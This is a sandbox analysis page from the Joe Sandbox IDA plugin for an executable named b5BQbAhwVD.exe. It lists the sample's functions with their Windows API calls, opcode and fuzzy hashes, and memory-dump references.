Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032F2

Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
SetFilePointer.KERNELBASE(0017AA5F,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69

Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E

Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00405EE2
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D

Function 72ED2AAC Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 72ED2B6B

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: eb9560cbb8b3cccc9b01fc4c8f5102e4c757ce07fa76d616cb11cf121683fc3c
Instruction ID: fcb66f42895ea7242808c0971f602b64e5105ec0555925843e6749cddd66c659
Opcode Fuzzy Hash: eb9560cbb8b3cccc9b01fc4c8f5102e4c757ce07fa76d616cb11cf121683fc3c
Instruction Fuzzy Hash: FE417076841204DFEB21DFA9E941B5D3B79EB44368FB0CC2AF405C6242D63598C2DB91

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
